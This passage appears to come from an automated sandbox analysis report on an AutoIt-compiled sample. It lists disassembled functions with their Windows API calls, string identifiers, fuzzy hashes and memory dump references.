                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                        • __fread_nolock.LIBCMT ref: 00452A39
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                        • String ID:
                        • API String ID: 2054058615-0
                        • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                        • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                        • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                        • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 6f3210a5ab060ead11f53c10cfa528f393dc22c49847a17e39d9eeb9bb722c2a
                        • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                        • Opcode Fuzzy Hash: 6f3210a5ab060ead11f53c10cfa528f393dc22c49847a17e39d9eeb9bb722c2a
                        • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                        APIs
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • GetWindowRect.USER32(?,?), ref: 004701EA
                        • GetClientRect.USER32(?,?), ref: 004701FA
                        • GetSystemMetrics.USER32(00000007), ref: 00470202
                        • GetSystemMetrics.USER32(00000008), ref: 00470216
                        • GetSystemMetrics.USER32(00000004), ref: 00470238
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                        • GetSystemMetrics.USER32(00000007), ref: 00470273
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                        • GetSystemMetrics.USER32(00000008), ref: 004702A8
                        • GetSystemMetrics.USER32(00000004), ref: 004702CF
                        • SetRect.USER32 ref: 004702F1
                        • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                        • CreateWindowExW.USER32 ref: 0047033E
                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                        • GetClientRect.USER32(?,?), ref: 00470371
                        • GetStockObject.GDI32(00000011), ref: 00470391
                        • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                        • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                        • String ID: AutoIt v3 GUI
                        • API String ID: 867697134-248962490
                        • Opcode ID: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                        • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                        • Opcode Fuzzy Hash: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                        • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                        APIs
                        • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044880A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window
                        • String ID: 0
                        • API String ID: 2353593579-4108050209
                        • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                        • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                        • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                        • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                        APIs
                        • GetSysColor.USER32 ref: 0044A11D
                        • GetClientRect.USER32(?,?), ref: 0044A18D
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                        • GetWindowDC.USER32(?), ref: 0044A1B3
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                        • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                        • GetSysColor.USER32(0000000F), ref: 0044A1EC
                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                        • GetSysColor.USER32(0000000F), ref: 0044A216
                        • GetSysColor.USER32(00000005), ref: 0044A21E
                        • GetWindowDC.USER32 ref: 0044A277
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                        • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                        • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                        • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                        • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                        • GetStockObject.GDI32(00000005), ref: 0044A312
                        • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                        • String ID:
                        • API String ID: 1744303182-0
                        • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                        • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                        • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                        • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll$__wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 790654849-1810252412
                        • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                        • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                        • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                        • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: >>>AUTOIT SCRIPT<<<$\
                        • API String ID: 0-1896584978
                        • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                        • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                        • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                        • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: InitVariant
                        • String ID:
                        • API String ID: 1927566239-0
                        • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                        • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                        • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                        • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                        APIs
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • GetForegroundWindow.USER32 ref: 0046D7C1
                        • GetForegroundWindow.USER32 ref: 0046DBA4
                        • IsWindow.USER32(?), ref: 0046DBDE
                        • GetDesktopWindow.USER32 ref: 0046DCB5
                        • EnumChildWindows.USER32 ref: 0046DCBC
                        • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                        • API String ID: 1322021666-1919597938
                        • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                        • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                        • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                        • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 0045DED4
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                        • _wcsncpy.LIBCMT ref: 0045DF0F
                        • __wsplitpath.LIBCMT ref: 0045DF54
                        • _wcscat.LIBCMT ref: 0045DF6C
                        • _wcscat.LIBCMT ref: 0045DF7E
                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                        • _wcscpy.LIBCMT ref: 0045E019
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                        • String ID: *.*
                        • API String ID: 3201719729-438819550
                        • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                        • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                        • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                        • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll$IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2485277191-404129466
                        • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                        • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                        • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                        • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                        APIs
                        • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                        • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                        • strncnt.LIBCMT ref: 00428646
                        • strncnt.LIBCMT ref: 0042865A
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: strncnt$CompareErrorLastString
                        • String ID:
                        • API String ID: 1776594460-0
                        • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                        • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                        • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                        • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                        APIs
                        • LoadIconW.USER32 ref: 004545DA
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                        • SetWindowTextW.USER32(?,?), ref: 00454606
                        • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                        • SetWindowTextW.USER32(00000000,?), ref: 00454626
                        • GetDlgItem.USER32(?,000003E9), ref: 00454637
                        • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                        • GetWindowRect.USER32(?,?), ref: 00454688
                        • SetWindowTextW.USER32(?,?), ref: 004546FD
                        • GetDesktopWindow.USER32 ref: 00454708
                        • GetWindowRect.USER32(00000000), ref: 0045470F
                        • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                        • GetClientRect.USER32(?,?), ref: 0045476F
                        • PostMessageW.USER32 ref: 0045479E
                        • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                        • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                        • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                        • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Cursor$Load$Info
                        • String ID:
                        • API String ID: 2577412497-0
                        • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                        • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                        • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                        • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessagePost$CtrlFocus
                        • String ID: 0
                        • API String ID: 1534620443-4108050209
                        • Opcode ID: 56abc5bcc62659c1be209ae6f4c633314a4860983281a49fd23976c3e3d454e4
                        • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                        • Opcode Fuzzy Hash: 56abc5bcc62659c1be209ae6f4c633314a4860983281a49fd23976c3e3d454e4
                        • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                        • String ID: 0
                        • API String ID: 3993528054-4108050209
                        • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                        • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                        • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                        • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                        APIs
                        • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                          • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                          • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                          • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                        • SendMessageW.USER32(?), ref: 0046F34C
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                        • _wcscat.LIBCMT ref: 0046F3BC
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                        • DragFinish.SHELL32(?), ref: 0046F414
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
